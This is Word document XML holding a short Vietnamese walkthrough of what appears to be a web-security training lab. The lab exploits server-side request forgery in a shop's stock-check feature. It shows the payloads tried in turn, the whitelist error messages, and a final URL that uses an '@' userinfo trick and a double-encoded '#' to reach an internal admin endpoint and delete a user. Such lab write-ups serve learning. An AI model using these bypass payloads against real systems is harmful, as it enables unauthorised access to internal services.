    <w:p w14:paraId="28A1C113" w14:textId="35F1F7BB" w:rsidR="00F57C17" w:rsidRDefault="00F57C17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Mình kiểm tra kho hàng của 1 sản phẩm. Thấy nó gửi đi Url để lấy Api của sản phẩm </w:t>
      </w:r>
      <w:r w:rsidRPr="00F57C17">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> lỗ hổng ssrf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB99083" w14:textId="4FE9A152" w:rsidR="00F57C17" w:rsidRDefault="00F57C17">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DE9550" w14:textId="457E2F66" w:rsidR="00F57C17" w:rsidRDefault="00F57C17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Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F57C17">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://stock.weliketoshop.net:8080/product/stock/check?productId=1&amp;storeId=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ED25A3" w14:textId="68C99FED" w:rsidR="00F57C17" w:rsidRDefault="00F57C17">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A092C67" w14:textId="247AEDA1" w:rsidR="00F57C17" w:rsidRDefault="00F57C17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Thử http://localhost/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFAFC07" w14:textId="06874CC2" w:rsidR="00F57C17" w:rsidRDefault="00F57C17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Nó báo lỗi: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F57C17">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"External stock check host must be stock.weliketoshop.net"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F986999" w14:textId="77777777" w:rsidR="006540B3" w:rsidRDefault="006540B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD8D08A" w14:textId="2DE9699B" w:rsidR="00F57C17" w:rsidRDefault="00F57C17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Ứng dụng đã phân tích Url, trích xuất tên máy chủ và so sánh với whitelist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E85309A" w14:textId="770C7F0F" w:rsidR="00F57C17" w:rsidRDefault="006540B3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Nó yêu cầu phải là máy chủ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F57C17">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stock.weliketoshop.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35734E59" w14:textId="3C198A2E" w:rsidR="006540B3" w:rsidRDefault="006540B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD6D2C4" w14:textId="5E606AB0" w:rsidR="006540B3" w:rsidRDefault="006540B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E9D8B3" w14:textId="2D2B210C" w:rsidR="006540B3" w:rsidRDefault="006540B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A9F90EA" w14:textId="77777777" w:rsidR="006540B3" w:rsidRDefault="006540B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E5134A1" w14:textId="20B614DB" w:rsidR="006540B3" w:rsidRDefault="006540B3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Áp dụng kiến thức trên, lợi dụng sự mâu thuẫn giữa parser và requester:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B04CB4E" w14:textId="6517D21F" w:rsidR="006540B3" w:rsidRDefault="006540B3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Payload: http://username@stock.weliketoshop.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE4CA4C" w14:textId="3442752C" w:rsidR="006540B3" w:rsidRDefault="006540B3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Thành công, nó báo 1 lỗi khác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7495F4C5" w14:textId="37DC16F6" w:rsidR="006540B3" w:rsidRDefault="006540B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1169BCB4" w14:textId="2F7DB2DE" w:rsidR="006540B3" w:rsidRDefault="006540B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006540B3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Could not connect to external stock check service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0443C5B8" w14:textId="3704D9DE" w:rsidR="006540B3" w:rsidRDefault="006540B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5026F210" w14:textId="57177572" w:rsidR="006540B3" w:rsidRDefault="006540B3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Chứng tỏ ứng dụng đã trích xuất tên máy chủ là stock.weliketoshop.net thành công (parser) nhưng vì requester là username nên </w:t>
      </w:r>
      <w:r w:rsidR="008639C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>báo lỗi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0093FA13" w14:textId="4FAEA45A" w:rsidR="008639C6" w:rsidRDefault="008639C6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Mình thử với localhost cx ko đc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E3E2AA" w14:textId="33F226CD" w:rsidR="008639C6" w:rsidRDefault="008639C6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Vậy phải làm sao để nó requester thành công?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7638F980" w14:textId="02C8AB6D" w:rsidR="008639C6" w:rsidRDefault="008639C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D868C6B" w14:textId="250AAD29" w:rsidR="001211D8" w:rsidRDefault="001211D8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payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="001211D8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%23</w:t>
      </w:r>
      <w:r w:rsidRPr="001211D8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@stock.weliketoshop.net/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A1D530" w14:textId="25E02202" w:rsidR="001211D8" w:rsidRDefault="001211D8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001211D8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"External stock check host must be stock.weliketoshop.net"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Dấu # không đc giải mã thành công. Thử với double encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED1DB3B" w14:textId="123E99C4" w:rsidR="001211D8" w:rsidRDefault="001211D8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="069D9D45" w14:textId="2E4FDC84" w:rsidR="001211D8" w:rsidRDefault="001211D8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payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="001211D8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%2523</w:t>
      </w:r>
      <w:r w:rsidRPr="001211D8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@stock.weliketoshop.net/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">admin/delete?user=carlos </w:t>
      </w:r>
      <w:r w:rsidRPr="001211D8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548F7419" w14:textId="77777777" w:rsidR="001211D8" w:rsidRDefault="001211D8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541A850C" w14:textId="77777777" w:rsidR="00FC7BA5" w:rsidRPr="005D5781" w:rsidRDefault="00FC7BA5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00FC7BA5" w:rsidRPr="005D578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BAFE2" w14:textId="77777777" w:rsidR="00BE462E" w:rsidRDefault="00BE462E" w:rsidP="00DB7296">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7375E701" w14:textId="77777777" w:rsidR="00BE462E" w:rsidRDefault="00BE462E" w:rsidP="00DB72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CC2EDD" w14:textId="77777777" w:rsidR="00BE462E" w:rsidRDefault="00BE462E" w:rsidP="00DB7296">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7768B204" w14:textId="77777777" w:rsidR="00BE462E" w:rsidRDefault="00BE462E" w:rsidP="00DB72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F861CE8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D48E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E28"/>
    <w:rsid w:val="001211D8"/>
    <w:rsid w:val="00152558"/>
    <w:rsid w:val="00270C89"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="0035730F"/>
    <w:rsid w:val="005D5781"/>
    <w:rsid w:val="0062310C"/>
    <w:rsid w:val="006540B3"/>
    <w:rsid w:val="008639C6"/>
    <w:rsid w:val="00B572B6"/>
    <w:rsid w:val="00BA4C3D"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BE462E"/>
    <w:rsid w:val="00DB7296"/>
    <w:rsid w:val="00EC41D5"/>
    <w:rsid w:val="00F20E28"/>
    <w:rsid w:val="00F212AF"/>
    <w:rsid w:val="00F57C17"/>
    <w:rsid w:val="00F60A53"/>
    <w:rsid w:val="00FC7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353E52"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F5F86F2D-7312-B847-96CE-8C570CE42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270C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729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7296"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB729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72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513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283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2022-11-06T10:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-22T03:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>